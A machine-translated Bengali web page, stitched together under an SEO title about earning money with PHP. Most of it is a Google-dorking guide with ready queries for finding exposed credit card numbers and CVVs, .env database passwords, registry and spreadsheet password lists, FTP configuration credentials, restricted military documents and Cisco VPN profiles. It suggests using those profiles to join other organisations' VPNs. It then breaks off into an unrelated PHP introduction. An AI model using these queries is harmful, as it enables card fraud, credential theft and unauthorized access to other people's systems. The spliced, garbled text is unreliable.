inurl php http কি আয়। কিভাবে PHP জেনে টাকা আয় করা যায়? কিভাবে একটি php প্রোগ্রামার বাড়িতে ভাল অর্থ উপার্জন করতে পারেন?
ব্যক্তিগত ডেটা পাওয়ার মানে সবসময় হ্যাকিং নয় - কখনও কখনও এটি সর্বজনীনভাবে প্রকাশিত হয়। Google সেটিংসের জ্ঞান এবং সামান্য বুদ্ধিমত্তা আপনাকে অনেক আকর্ষণীয় জিনিস খুঁজে পেতে অনুমতি দেবে - ক্রেডিট কার্ড নম্বর থেকে FBI নথি।
সতর্কতা
সমস্ত তথ্য শুধুমাত্র তথ্যগত উদ্দেশ্যে প্রদান করা হয়. এই নিবন্ধের উপকরণগুলির দ্বারা সৃষ্ট সম্ভাব্য ক্ষতির জন্য সম্পাদক বা লেখক উভয়ই দায়ী নন।আজ, সবকিছুই ইন্টারনেটের সাথে সংযুক্ত, অ্যাক্সেস সীমাবদ্ধ করার জন্য সামান্য উদ্বেগের সাথে। অতএব, অনেক ব্যক্তিগত তথ্য সার্চ ইঞ্জিনের শিকার হয়ে ওঠে। স্পাইডার রোবট আর ওয়েব পৃষ্ঠাগুলিতে সীমাবদ্ধ নয়, তবে ইন্টারনেটে উপলব্ধ সমস্ত সামগ্রীকে সূচী করে এবং তাদের ডেটাবেসে অবিরত অ-পাবলিক তথ্য যুক্ত করে। এই গোপন বিষয়গুলি খুঁজে বের করা সহজ - আপনাকে তাদের সম্পর্কে কীভাবে জিজ্ঞাসা করতে হবে তা জানতে হবে।
ফাইল খুঁজছেন
সক্ষম হাতে, গুগল দ্রুত সবকিছু খুঁজে পাবে যা ইন্টারনেটে পাওয়া যায় না, উদাহরণস্বরূপ, ব্যক্তিগত তথ্য এবং অফিসিয়াল ব্যবহারের জন্য ফাইল। এগুলি প্রায়শই একটি পাটির নীচে চাবির মতো লুকিয়ে থাকে: কোনও বাস্তব অ্যাক্সেসের বিধিনিষেধ নেই, ডেটা কেবল সাইটের পিছনে থাকে, যেখানে কোনও লিঙ্ক লিড করে না। স্ট্যান্ডার্ড Google ওয়েব ইন্টারফেস শুধুমাত্র মৌলিক উন্নত অনুসন্ধান সেটিংস প্রদান করে, কিন্তু এমনকি এইগুলি যথেষ্ট হবে।
আপনি দুটি অপারেটর ব্যবহার করে আপনার Google অনুসন্ধানকে একটি নির্দিষ্ট ধরণের ফাইলের মধ্যে সীমাবদ্ধ করতে পারেন: filetype এবং ext। প্রথমটি ফাইলের শিরোনাম থেকে সার্চ ইঞ্জিন দ্বারা নির্ধারিত বিন্যাসটি নির্দিষ্ট করে, দ্বিতীয়টি ফাইল এক্সটেনশনটি নির্দিষ্ট করে, তার অভ্যন্তরীণ বিষয়বস্তু নির্বিশেষে। উভয় ক্ষেত্রে অনুসন্ধান করার সময়, আপনাকে শুধুমাত্র এক্সটেনশনটি নির্দিষ্ট করতে হবে। প্রাথমিকভাবে, ext অপারেটরটি এমন ক্ষেত্রে ব্যবহার করা সুবিধাজনক ছিল যেখানে ফাইলের নির্দিষ্ট বিন্যাসের বৈশিষ্ট্য ছিল না (উদাহরণস্বরূপ, ini এবং cfg কনফিগারেশন ফাইলগুলি অনুসন্ধান করা, যা কিছু থাকতে পারে)। এখন Google এর অ্যালগরিদম পরিবর্তিত হয়েছে, এবং অপারেটরদের মধ্যে কোন দৃশ্যমান পার্থক্য নেই - বেশিরভাগ ক্ষেত্রে ফলাফল একই।
ফলাফল ফিল্টারিং
ডিফল্টরূপে, Google শব্দগুলির জন্য অনুসন্ধান করে এবং, সাধারণভাবে, সূচীকৃত পৃষ্ঠাগুলিতে সমস্ত ফাইলে প্রবেশ করা কোনো অক্ষর। আপনি শীর্ষ-স্তরের ডোমেন, একটি নির্দিষ্ট সাইট বা ফাইলগুলিতে অনুসন্ধানের ক্রমটির অবস্থান দ্বারা অনুসন্ধান এলাকা সীমাবদ্ধ করতে পারেন। প্রথম দুটি বিকল্পের জন্য, সাইট অপারেটর ব্যবহার করুন, ডোমেন বা নির্বাচিত সাইটের নাম অনুসরণ করুন৷ তৃতীয় ক্ষেত্রে, অপারেটরগুলির একটি সম্পূর্ণ সেট আপনাকে পরিষেবা ক্ষেত্র এবং মেটাডেটাতে তথ্য অনুসন্ধান করতে দেয়। উদাহরণস্বরূপ, allinurl প্রদত্তটিকে লিঙ্কের মূল অংশে খুঁজে পাবে, allinachor - ট্যাগ দিয়ে সজ্জিত পাঠ্যে , allintitle - পৃষ্ঠার শিরোনামে, allintext - পৃষ্ঠাগুলির মূল অংশে।
প্রতিটি অপারেটরের জন্য একটি ছোট নাম সহ একটি হালকা সংস্করণ রয়েছে (সব উপসর্গ ছাড়া)। পার্থক্য হল allinurl সমস্ত শব্দের সাথে লিঙ্ক খুঁজে পাবে, এবং inurl শুধুমাত্র প্রথমটির সাথে লিঙ্ক খুঁজে পাবে। কোয়েরি থেকে দ্বিতীয় এবং পরবর্তী শব্দগুলি ওয়েব পৃষ্ঠাগুলিতে যে কোনও জায়গায় উপস্থিত হতে পারে৷ inurl অপারেটর একই অর্থ সহ অন্য অপারেটর থেকে পৃথক - সাইট। প্রথমটি আপনাকে অনুসন্ধান করা নথিতে (উদাহরণস্বরূপ, /cgi-bin/) একটি লিঙ্কে অক্ষরের যেকোনো ক্রম খুঁজে পেতে দেয়, যা পরিচিত দুর্বলতা সহ উপাদানগুলি খুঁজে পেতে ব্যাপকভাবে ব্যবহৃত হয়।
এর অনুশীলনে এটি চেষ্টা করা যাক। আমরা অ্যালিনটেক্সট ফিল্টারটি গ্রহণ করি এবং অনুরোধটি ক্রেডিট কার্ডের নম্বর এবং যাচাইকরণ কোডগুলির একটি তালিকা তৈরি করি যা শুধুমাত্র দুই বছরের মধ্যে শেষ হবে (বা যখন তাদের মালিকরা সবাইকে খাওয়াতে ক্লান্ত হয়ে পড়ে)।
Allintext: কার্ড নম্বর মেয়াদ শেষ হওয়ার তারিখ /2017 cvv
আপনি যখন খবরে পড়েন যে একজন তরুণ হ্যাকার পেন্টাগন বা নাসার "সার্ভারে হ্যাক করেছে", শ্রেণীবদ্ধ তথ্য চুরি করেছে, বেশিরভাগ ক্ষেত্রে আমরা গুগল ব্যবহার করার এমন একটি প্রাথমিক কৌশল সম্পর্কে কথা বলছি। ধরুন আমরা নাসার কর্মীদের একটি তালিকা এবং তাদের যোগাযোগের তথ্যে আগ্রহী। নিশ্চয় এই ধরনের একটি তালিকা ইলেকট্রনিক আকারে পাওয়া যায়। সুবিধার জন্য বা তদারকির কারণে, এটি প্রতিষ্ঠানের ওয়েবসাইটেও থাকতে পারে। এটি যৌক্তিক যে এই ক্ষেত্রে এটির সাথে কোনও লিঙ্ক থাকবে না, যেহেতু এটি অভ্যন্তরীণ ব্যবহারের উদ্দেশ্যে। কি শব্দ এই ধরনের একটি ফাইল হতে পারে? সর্বনিম্ন - "ঠিকানা" ক্ষেত্র। এই সমস্ত অনুমান পরীক্ষা করা সহজ।
Inurl:nasa.gov ফাইলের ধরন:xlsx "ঠিকানা"
আমরা আমলাতন্ত্র ব্যবহার করি
এই মত খুঁজে একটি চমৎকার স্পর্শ. ওয়েবমাস্টারদের জন্য Google-এর অপারেটরদের আরও বিশদ জ্ঞান, নেটওয়ার্ক নিজেই, এবং যা চাওয়া হচ্ছে তার কাঠামোর অদ্ভুততা দ্বারা একটি সত্যিকারের কঠিন ক্যাচ প্রদান করা হয়। বিশদটি জেনে, আপনি সহজেই ফলাফলগুলি ফিল্টার করতে পারেন এবং বাকিগুলিতে সত্যই মূল্যবান ডেটা পেতে প্রয়োজনীয় ফাইলগুলির বৈশিষ্ট্যগুলিকে পরিমার্জন করতে পারেন৷ এটা মজার যে আমলাতন্ত্র এখানে উদ্ধারে আসে। এটি স্ট্যান্ডার্ড ফর্মুলেশন তৈরি করে যা দুর্ঘটনাক্রমে ইন্টারনেটে ফাঁস হওয়া গোপন তথ্য অনুসন্ধানের জন্য সুবিধাজনক।
উদাহরণস্বরূপ, ডিস্ট্রিবিউশন স্টেটমেন্ট স্ট্যাম্প, ইউএস ডিপার্টমেন্ট অফ ডিফেন্সের দ্বারা প্রয়োজনীয়, মানে একটি নথির বিতরণের উপর প্রমিত বিধিনিষেধ। A চিঠিটি প্রকাশ্য প্রকাশকে বোঝায় যেখানে গোপন কিছু নেই; B - শুধুমাত্র অভ্যন্তরীণ ব্যবহারের জন্য উদ্দিষ্ট, C - কঠোরভাবে গোপনীয়, এবং F যতক্ষণ পর্যন্ত না। X অক্ষরটি আলাদাভাবে দাঁড়িয়েছে, যা বিশেষভাবে মূল্যবান তথ্যকে চিহ্নিত করে যা সর্বোচ্চ স্তরের রাষ্ট্রীয় গোপনীয়তার প্রতিনিধিত্ব করে। যাদের ডিউটিতে এটি করার কথা তাদের এই ধরনের নথিগুলি অনুসন্ধান করতে দিন, এবং আমরা নিজেদেরকে সি অক্ষরের ফাইলগুলিতে সীমাবদ্ধ রাখব। DoDI নির্দেশিকা 5230.24 অনুসারে, এই মার্কিংটি রপ্তানি নিয়ন্ত্রণের আওতায় পড়ে এমন গুরুত্বপূর্ণ প্রযুক্তিগুলির বিবরণ সম্বলিত নথিতে বরাদ্দ করা হয়েছে। . আপনি মার্কিন সেনাবাহিনীর জন্য বরাদ্দ শীর্ষ-স্তরের domain.mil-এ সাইটগুলিতে এই ধরনের সাবধানে সুরক্ষিত তথ্য পেতে পারেন।
"ডিস্ট্রিবিউশন স্টেটমেন্ট সি" inurl:navy.mil
এটা খুবই সুবিধাজনক যে .mil ডোমেনে শুধুমাত্র মার্কিন প্রতিরক্ষা বিভাগ এবং এর চুক্তি সংস্থাগুলির সাইট রয়েছে৷ একটি ডোমেন সীমাবদ্ধতা সহ অনুসন্ধান ফলাফলগুলি ব্যতিক্রমীভাবে পরিষ্কার এবং শিরোনামগুলি নিজেদের জন্য কথা বলে৷ এইভাবে রাশিয়ান গোপনীয়তাগুলি অনুসন্ধান করা কার্যত অকেজো: domains.ru এবং.rf-এ বিশৃঙ্খলা রাজত্ব করছে এবং অনেক অস্ত্র সিস্টেমের নাম বোটানিকালের মতো শোনাচ্ছে (পিপি "কিপারিস", স্ব-চালিত বন্দুক "আকাতসিয়া") বা এমনকি কল্পিত ( TOS "বুরাটিনো")।
.mil ডোমেনের একটি সাইট থেকে যেকোন নথি সাবধানে অধ্যয়ন করে, আপনি আপনার অনুসন্ধানকে পরিমার্জিত করতে অন্যান্য চিহ্নিতকারী দেখতে পারেন। উদাহরণস্বরূপ, রপ্তানি বিধিনিষেধের একটি রেফারেন্স "Sec 2751", যা আকর্ষণীয় প্রযুক্তিগত তথ্য অনুসন্ধানের জন্যও সুবিধাজনক। সময়ে সময়ে এটি অফিসিয়াল সাইটগুলি থেকে সরানো হয় যেখানে এটি একবার উপস্থিত হয়েছিল, তাই আপনি যদি অনুসন্ধান ফলাফলে একটি আকর্ষণীয় লিঙ্ক অনুসরণ করতে না পারেন তবে Google এর ক্যাশে (ক্যাশে অপারেটর) বা ইন্টারনেট সংরক্ষণাগার সাইট ব্যবহার করুন।
মেঘের মধ্যে আরোহণ
দুর্ঘটনাক্রমে ডিক্লাসিফায়েড সরকারি নথি ছাড়াও, ড্রপবক্স থেকে ব্যক্তিগত ফাইলের লিঙ্ক এবং অন্যান্য ডেটা স্টোরেজ পরিষেবা যা সর্বজনীনভাবে প্রকাশিত ডেটার "ব্যক্তিগত" লিঙ্ক তৈরি করে মাঝে মাঝে Google এর ক্যাশে পপ আপ করে। এটি বিকল্প এবং বাড়িতে তৈরি পরিষেবাগুলির সাথে আরও খারাপ। উদাহরণস্বরূপ, নিম্নলিখিত ক্যোয়ারীটি সমস্ত Verizon গ্রাহকদের জন্য ডেটা খুঁজে পায় যাদের একটি FTP সার্ভার ইনস্টল করা আছে এবং সক্রিয়ভাবে তাদের রাউটার ব্যবহার করে৷
Allinurl:ftp:// verizon.net
এখন এমন চল্লিশ হাজারেরও বেশি স্মার্ট মানুষ রয়েছে এবং 2015 সালের বসন্তে তাদের মধ্যে আরও অনেক ছিল। Verizon.net-এর পরিবর্তে, আপনি যে কোনও সুপরিচিত প্রদানকারীর নাম প্রতিস্থাপন করতে পারেন এবং এটি যত বেশি বিখ্যাত, ক্যাচটি তত বড় হতে পারে। অন্তর্নির্মিত FTP সার্ভারের মাধ্যমে, আপনি রাউটারের সাথে সংযুক্ত একটি বহিরাগত স্টোরেজ ডিভাইসে ফাইলগুলি দেখতে পারেন। সাধারণত এটি দূরবর্তী কাজ, একটি ব্যক্তিগত ক্লাউড বা পিয়ার-টু-পিয়ার ফাইল ডাউনলোড করার জন্য একটি NAS। এই ধরনের মিডিয়ার সমস্ত বিষয়বস্তু Google এবং অন্যান্য সার্চ ইঞ্জিন দ্বারা সূচিত করা হয়, তাই আপনি সরাসরি লিঙ্কের মাধ্যমে বহিরাগত ড্রাইভে সঞ্চিত ফাইলগুলি অ্যাক্সেস করতে পারেন।
কনফিগারেশন দেখছি
ক্লাউডে ব্যাপকভাবে স্থানান্তরিত হওয়ার আগে, সাধারণ FTP সার্ভারগুলি দূরবর্তী সঞ্চয়স্থান হিসাবে শাসন করত, যার অনেক দুর্বলতাও ছিল। তাদের মধ্যে অনেক আজও প্রাসঙ্গিক। উদাহরণস্বরূপ, জনপ্রিয় WS_FTP প্রফেশনাল প্রোগ্রাম ws_ftp.ini ফাইলে কনফিগারেশন ডেটা, ব্যবহারকারীর অ্যাকাউন্ট এবং পাসওয়ার্ড সংরক্ষণ করে। এটি খুঁজে পাওয়া এবং পড়া সহজ, যেহেতু সমস্ত রেকর্ড টেক্সট ফর্ম্যাটে সংরক্ষিত হয় এবং পাসওয়ার্ডগুলি ন্যূনতম অস্পষ্টতার পরে ট্রিপল ডিইএস অ্যালগরিদম দিয়ে এনক্রিপ্ট করা হয়। বেশিরভাগ সংস্করণে, প্রথম বাইটটি বাতিল করাই যথেষ্ট।
WS_FTP পাসওয়ার্ড ডিক্রিপ্টর ইউটিলিটি বা একটি বিনামূল্যের ওয়েব পরিষেবা ব্যবহার করে এই জাতীয় পাসওয়ার্ডগুলি ডিক্রিপ্ট করা সহজ।
একটি নির্বিচারে ওয়েবসাইট হ্যাক করার বিষয়ে কথা বলার সময়, তারা সাধারণত সিএমএস বা ই-কমার্স অ্যাপ্লিকেশনের কনফিগারেশন ফাইলগুলির লগ এবং ব্যাকআপ থেকে একটি পাসওয়ার্ড প্রাপ্ত করার অর্থ বোঝায়। আপনি যদি তাদের সাধারণ গঠন জানেন তবে আপনি সহজেই কীওয়ার্ডগুলি নির্দেশ করতে পারেন। ws_ftp.ini তে পাওয়া লাইনগুলির মতো লাইনগুলি অত্যন্ত সাধারণ। উদাহরণস্বরূপ, Drupal এবং PrestaShop-এ সর্বদা একটি ব্যবহারকারী সনাক্তকারী (UID) এবং একটি সংশ্লিষ্ট পাসওয়ার্ড (pwd) থাকে এবং সমস্ত তথ্য .inc এক্সটেনশন সহ ফাইলগুলিতে সংরক্ষণ করা হয়। আপনি নিম্নলিখিত হিসাবে তাদের জন্য অনুসন্ধান করতে পারেন:
"pwd=" "UID=" ext:inc
DBMS পাসওয়ার্ড প্রকাশ করা হচ্ছে
SQL সার্ভারের কনফিগারেশন ফাইলগুলিতে, ব্যবহারকারীর নাম এবং ইমেল ঠিকানাগুলি পরিষ্কার পাঠ্যে সংরক্ষণ করা হয় এবং তাদের MD5 হ্যাশগুলি পাসওয়ার্ডের পরিবর্তে লেখা হয়। কঠোরভাবে বলতে গেলে, তাদের ডিক্রিপ্ট করা অসম্ভব, তবে আপনি পরিচিত হ্যাশ-পাসওয়ার্ড জোড়ার মধ্যে একটি মিল খুঁজে পেতে পারেন।
এখনও এমন ডিবিএমএস রয়েছে যেগুলি এমনকি পাসওয়ার্ড হ্যাশিং ব্যবহার করে না। তাদের যে কোনোটির কনফিগারেশন ফাইল ব্রাউজারে সহজভাবে দেখা যায়।
Intext:DB_PASSWORD ফাইলের ধরন:env
উইন্ডোজ সার্ভারের আবির্ভাবের সাথে, কনফিগারেশন ফাইলগুলির স্থানটি আংশিকভাবে রেজিস্ট্রি দ্বারা নেওয়া হয়েছিল। আপনি ফাইলের ধরন হিসাবে reg ব্যবহার করে ঠিক একইভাবে এর শাখাগুলির মাধ্যমে অনুসন্ধান করতে পারেন। উদাহরণস্বরূপ, এই মত:
ফাইলের ধরন:reg HKEY_CURRENT_USER "পাসওয়ার্ড"=
এর সুস্পষ্ট ভুলবেন না
কখনও কখনও দুর্ঘটনাক্রমে খোলা এবং Google এর নজরে আসা ডেটা ব্যবহার করে শ্রেণীবদ্ধ তথ্য পাওয়া সম্ভব। আদর্শ বিকল্প হল কিছু সাধারণ বিন্যাসে পাসওয়ার্ডের একটি তালিকা খুঁজে বের করা। শুধুমাত্র বেপরোয়া লোকেরাই একটি টেক্সট ফাইল, ওয়ার্ড ডকুমেন্ট বা এক্সেল স্প্রেডশীটে অ্যাকাউন্টের তথ্য সংরক্ষণ করতে পারে, তবে সেগুলি সবসময় যথেষ্ট থাকে।
ফাইলের ধরন: xls inurl: পাসওয়ার্ড
একদিকে, এই ধরনের ঘটনা প্রতিরোধের অনেক উপায় আছে। htaccess-এ পর্যাপ্ত অ্যাক্সেসের অধিকার উল্লেখ করা, CMS প্যাচ করা, বাম-হাতের স্ক্রিপ্ট ব্যবহার না করা এবং অন্যান্য ছিদ্র বন্ধ করা প্রয়োজন। এছাড়াও robots.txt ব্যতিক্রমগুলির একটি তালিকা সহ একটি ফাইল রয়েছে যা সার্চ ইঞ্জিনগুলিকে এটিতে নির্দিষ্ট করা ফাইল এবং ডিরেক্টরিগুলিকে সূচীকরণ থেকে নিষিদ্ধ করে৷ অন্যদিকে, যদি কিছু সার্ভারে robots.txt-এর গঠন স্ট্যান্ডার্ডের থেকে আলাদা হয়, তাহলে তা অবিলম্বে স্পষ্ট হয়ে যায় যে তারা এতে কী লুকানোর চেষ্টা করছে।
যে কোনো সাইটের ডিরেক্টরি এবং ফাইলের তালিকার পূর্বে স্ট্যান্ডার্ড ইনডেক্স থাকে। যেহেতু পরিষেবার উদ্দেশ্যে এটি শিরোনামে উপস্থিত হওয়া আবশ্যক, তাই এটির অনুসন্ধানটি ইনটাইটেল অপারেটরের মধ্যে সীমাবদ্ধ করা বোধগম্য। আকর্ষণীয় জিনিসগুলি /admin/, /personal/, /etc/ এবং এমনকি /secret/ ডিরেক্টরিতে রয়েছে।
আপডেটের জন্য সাথে থাকুন
প্রাসঙ্গিকতা এখানে অত্যন্ত গুরুত্বপূর্ণ: পুরানো দুর্বলতাগুলি খুব ধীরে ধীরে বন্ধ হয়ে গেছে, কিন্তু Google এবং এর অনুসন্ধান ফলাফল ক্রমাগত পরিবর্তিত হচ্ছে। এমনকি একটি "শেষ সেকেন্ড" ফিল্টার (&tbs=qdr:s অনুরোধের URL-এর শেষে) এবং একটি "রিয়েল টাইম" ফিল্টার (&tbs=qdr:1) এর মধ্যে পার্থক্য রয়েছে।
ফাইলের শেষ আপডেটের তারিখের সময়ের ব্যবধানও Google দ্বারা নিহিতভাবে নির্দেশ করা হয়েছে। গ্রাফিকাল ওয়েব ইন্টারফেসের মাধ্যমে, আপনি স্ট্যান্ডার্ড পিরিয়ডগুলির মধ্যে একটি নির্বাচন করতে পারেন (ঘন্টা, দিন, সপ্তাহ, ইত্যাদি) বা একটি তারিখ পরিসীমা সেট করতে পারেন, তবে এই পদ্ধতিটি অটোমেশনের জন্য উপযুক্ত নয়৷
ঠিকানা বারের চেহারা থেকে, আপনি শুধুমাত্র &tbs=qdr: নির্মাণ ব্যবহার করে ফলাফলের আউটপুট সীমিত করার উপায় সম্পর্কে অনুমান করতে পারেন। y অক্ষর এটি এক বছরের (&tbs=qdr:y) সীমা নির্ধারণ করার পরে, m গত মাসের ফলাফল দেখায়, w - সপ্তাহের জন্য, d - গত দিনের জন্য, h - শেষ ঘন্টার জন্য, n - মিনিটের জন্য, এবং s - আমাকে এক সেকেন্ডের জন্য। Google সবেমাত্র যে সব সাম্প্রতিক ফলাফল প্রকাশ করেছে তা &tbs=qdr:1 ফিল্টার ব্যবহার করে পাওয়া যায়।
আপনার যদি একটি চতুর স্ক্রিপ্ট লেখার প্রয়োজন হয়, তবে তারিখ পরিসীমা তারিখের অপারেটর ব্যবহার করে জুলিয়ান বিন্যাসে Google-এ সেট করা আছে তা জেনে রাখা কার্যকর হবে। উদাহরণস্বরূপ, এইভাবে আপনি গোপনীয় শব্দটি সহ PDF নথিগুলির একটি তালিকা খুঁজে পেতে পারেন, যা 1 জানুয়ারি থেকে 1 জুলাই, 2015 পর্যন্ত ডাউনলোড করা হয়েছে৷
গোপনীয় ফাইলের ধরন:pdf daterange:2457024-2457205
ভগ্নাংশ বিবেচনা না করেই পরিসরটি জুলিয়ান তারিখ বিন্যাসে নির্দেশিত হয়। গ্রেগরিয়ান ক্যালেন্ডার থেকে তাদের ম্যানুয়ালি অনুবাদ করা অসুবিধাজনক। একটি তারিখ রূপান্তরকারী ব্যবহার করা সহজ।
আবার টার্গেটিং এবং ফিল্টারিং
অনুসন্ধান ক্যোয়ারীতে অতিরিক্ত অপারেটরগুলি নির্দিষ্ট করার পাশাপাশি, সেগুলি সরাসরি লিঙ্কের মূল অংশে পাঠানো যেতে পারে। উদাহরণস্বরূপ, filetype:pdf স্পেসিফিকেশন নির্মাণের সাথে মিলে যায় as_filetype=pdf। এটি কোন স্পষ্টীকরণ জিজ্ঞাসা করা সুবিধাজনক করে তোলে। ধরা যাক যে শুধুমাত্র হন্ডুরাস প্রজাতন্ত্রের ফলাফলের আউটপুট সার্চ URL-এ নির্মাণ cr=countryHN যোগ করে নির্দিষ্ট করা হয়েছে এবং শুধুমাত্র Bobruisk - gcs=Bobruisk শহর থেকে। আপনি বিকাশকারী বিভাগে একটি সম্পূর্ণ তালিকা খুঁজে পেতে পারেন।
Google-এর অটোমেশন টুলগুলি জীবনকে সহজ করার জন্য ডিজাইন করা হয়েছে, কিন্তু তারা প্রায়ই সমস্যা যোগ করে। উদাহরণস্বরূপ, ব্যবহারকারীর শহর WHOIS এর মাধ্যমে ব্যবহারকারীর IP দ্বারা নির্ধারিত হয়। এই তথ্যের উপর ভিত্তি করে, Google শুধুমাত্র সার্ভারের মধ্যে ভারসাম্য বজায় রাখে না, কিন্তু অনুসন্ধান ফলাফলও পরিবর্তন করে। অঞ্চলের উপর নির্ভর করে, একই অনুরোধের জন্য, প্রথম পৃষ্ঠায় বিভিন্ন ফলাফল প্রদর্শিত হবে এবং তাদের মধ্যে কিছু সম্পূর্ণরূপে লুকানো থাকতে পারে। gl=country নির্দেশের পরে দুই-অক্ষরের কোড আপনাকে একটি মহাজাগতিক মনে করতে এবং যেকোনো দেশের তথ্য অনুসন্ধান করতে সাহায্য করবে। উদাহরণস্বরূপ, নেদারল্যান্ডের কোড হল NL, কিন্তু ভ্যাটিকান এবং উত্তর কোরিয়ার Google-এ তাদের নিজস্ব কোড নেই।
প্রায়শই, বেশ কয়েকটি উন্নত ফিল্টার ব্যবহার করার পরেও অনুসন্ধানের ফলাফলগুলি বিশৃঙ্খল থাকে। এই ক্ষেত্রে, এটিতে বেশ কয়েকটি ব্যতিক্রম শব্দ যোগ করে অনুরোধটি স্পষ্ট করা সহজ (এগুলির প্রত্যেকটির সামনে একটি বিয়োগ চিহ্ন স্থাপন করা হয়েছে)। উদাহরণস্বরূপ, ব্যাঙ্কিং, নাম এবং টিউটোরিয়াল প্রায়ই ব্যক্তিগত শব্দের সাথে ব্যবহার করা হয়। অতএব, ক্লিনার অনুসন্ধান ফলাফলগুলি একটি প্রশ্নের পাঠ্যপুস্তকের উদাহরণ দ্বারা নয়, একটি পরিমার্জিত দ্বারা দেখানো হবে:
শিরোনাম: "/ব্যক্তিগত/-এর সূচক" -নাম -টিউটোরিয়াল -ব্যাংকিং
একটি শেষ উদাহরণ
একজন অত্যাধুনিক হ্যাকারকে আলাদা করা হয় যে সে নিজে থেকেই তার প্রয়োজনীয় সবকিছু সরবরাহ করে। উদাহরণস্বরূপ, ভিপিএন একটি সুবিধাজনক জিনিস, তবে হয় ব্যয়বহুল, বা অস্থায়ী এবং বিধিনিষেধ সহ। নিজের জন্য একটি সাবস্ক্রিপশনের জন্য সাইন আপ করা খুব ব্যয়বহুল। এটা ভাল যে গ্রুপ সাবস্ক্রিপশন আছে, এবং Google এর সাহায্যে একটি গ্রুপের অংশ হওয়া সহজ। এটি করার জন্য, শুধু Cisco VPN কনফিগারেশন ফাইলটি খুঁজুন, যার একটি বরং অ-মানক PCF এক্সটেনশন এবং একটি স্বীকৃত পাথ রয়েছে: Program Files\Cisco Systems\VPN Client\Profiles। একটি অনুরোধ এবং আপনি যোগদান করুন, উদাহরণস্বরূপ, বন বিশ্ববিদ্যালয়ের বন্ধুত্বপূর্ণ দল।
ফাইলের ধরন: পিসিএফ ভিপিএন বা গ্রুপ
তথ্য
Google পাসওয়ার্ড কনফিগারেশন ফাইলগুলি খুঁজে পায়, কিন্তু তাদের অনেকগুলি এনক্রিপ্ট করা হয় বা হ্যাশ দিয়ে প্রতিস্থাপিত হয়। আপনি যদি একটি নির্দিষ্ট দৈর্ঘ্যের স্ট্রিংগুলি দেখতে পান, তাহলে অবিলম্বে একটি ডিক্রিপশন পরিষেবা সন্ধান করুন৷পাসওয়ার্ডগুলি এনক্রিপ্ট করে সংরক্ষণ করা হয়, কিন্তু মরিস ম্যাসার্ড ইতিমধ্যেই সেগুলিকে ডিক্রিপ্ট করার জন্য একটি প্রোগ্রাম লিখেছে এবং তা thecampusgeeks.com এর মাধ্যমে বিনামূল্যে প্রদান করে৷
Google শত শত বিভিন্ন ধরনের আক্রমণ এবং অনুপ্রবেশ পরীক্ষা চালায়। জনপ্রিয় প্রোগ্রাম, প্রধান ডাটাবেস ফরম্যাট, পিএইচপি, ক্লাউড ইত্যাদির অসংখ্য দুর্বলতাকে প্রভাবিত করে এমন অনেক বিকল্প রয়েছে। আপনি যা খুঁজছেন তা সঠিকভাবে জানার ফলে আপনার প্রয়োজনীয় তথ্য খুঁজে পাওয়া আরও সহজ হবে (বিশেষ করে এমন তথ্য যা আপনি সর্বজনীন করতে চাননি)। Shodan আকর্ষণীয় ধারণা সঙ্গে ফিড যে শুধুমাত্র এক নয়, কিন্তু সূচীকৃত নেটওয়ার্ক সম্পদের প্রতিটি ডাটাবেস!
লেখক থেকে:হ্যালো বন্ধুরা! এই নিবন্ধে আমরা পিএইচপি প্রোগ্রামিং ভাষা সম্পর্কে কথা বলব। আসুন জেনে নেই এটি কিসের জন্য ব্যবহার করা হয়, আপনি এটি দিয়ে কি করতে পারেন এবং ওয়েবসাইট ডেভেলপমেন্টের পর্যায়ে এটি কোন স্থান দখল করে। এছাড়াও এই নিবন্ধে আমরা পিএইচপি-তে কীভাবে প্রোগ্রাম করতে হয় তা জেনে অর্থ উপার্জনের অনেক উপায় দেখব।
পিএইচপি কি এবং এটা কি জন্য?
পিএইচপি একটি স্ক্রিপ্টিং ভাষা যা ওয়েব অ্যাপ্লিকেশনের বিকাশে খুব সক্রিয়ভাবে ব্যবহৃত হয়। PHP হল একটি নেতৃস্থানীয় ভাষা যা গতিশীল ওয়েবসাইট তৈরিতে ব্যবহৃত হয়।
পিএইচপি একটি সার্ভার-সাইড প্রোগ্রামিং ভাষা। এই ভাষায় লেখা সমস্ত স্ক্রিপ্ট সাইটের সাথে সার্ভারে কার্যকর করা হয়। পিএইচপি অধ্যয়ন করতে, ওয়েবসাইট এবং স্ক্রিপ্টগুলি বিকাশ এবং ডিবাগ করতে, অবশ্যই, আপনাকে ইন্টারনেটে একটি আসল সার্ভার কিনতে হবে না। এই উদ্দেশ্যে, সার্ভার এমুলেটর ব্যবহার করা হয়, যা প্রোগ্রাম আকারে সহজভাবে একটি কর্মক্ষম কম্পিউটারে ইনস্টল করা হয়। এবং ইন্টারনেটে একটি সার্ভারে (হোস্টিং) রেডিমেড ওয়েবসাইট এবং পিএইচপি স্ক্রিপ্ট সহ পেজ স্থাপন করা হয়। যাইহোক, প্রায় সমস্ত আধুনিক হোস্টিং পিএইচপি ভাষা সমর্থন করে।
ওয়েবসাইট বিল্ডিংয়ের ক্ষেত্রে এই ভাষার জনপ্রিয়তা ওয়েব অ্যাপ্লিকেশন বিকাশের জন্য বিল্ট-ইন সরঞ্জামগুলির একটি বড় সেটের উপস্থিতি দ্বারা নির্ধারিত হয়। প্রধানগুলো:
POST এবং GET প্যারামিটারগুলির স্বয়ংক্রিয় নিষ্কাশন, সেইসাথে ওয়েব সার্ভারের পরিবেশ ভেরিয়েবলগুলি পূর্বনির্ধারিত অ্যারেগুলিতে;
বিপুল সংখ্যক বিভিন্ন ডাটাবেস ম্যানেজমেন্ট সিস্টেমের সাথে মিথস্ক্রিয়া (MySQL, MySQLi, SQLite, PostgreSQL, Oracle (OCI8), Oracle, Microsoft SQL Server, Sybase, ODBC, mSQL, IBM DB2, Cloudscape এবং Apache Derby, Informix, Ovrimos SQL, Los নোট , DB++, DBM, dBase, DBX, FrontBase, FilePro, Ingres II, SESAM, Firebird/InterBase, Paradox File Access, MaxDB, PDO ইন্টারফেস);
স্বয়ংক্রিয়ভাবে HTTP হেডার পাঠানো;
কুকিজ এবং সেশনের সাথে কাজ করা;
স্থানীয় এবং দূরবর্তী ফাইল, সকেট সঙ্গে কাজ;
সার্ভারে আপলোড করা ফাইল প্রক্রিয়াকরণ;
XForms এর সাথে কাজ করা।
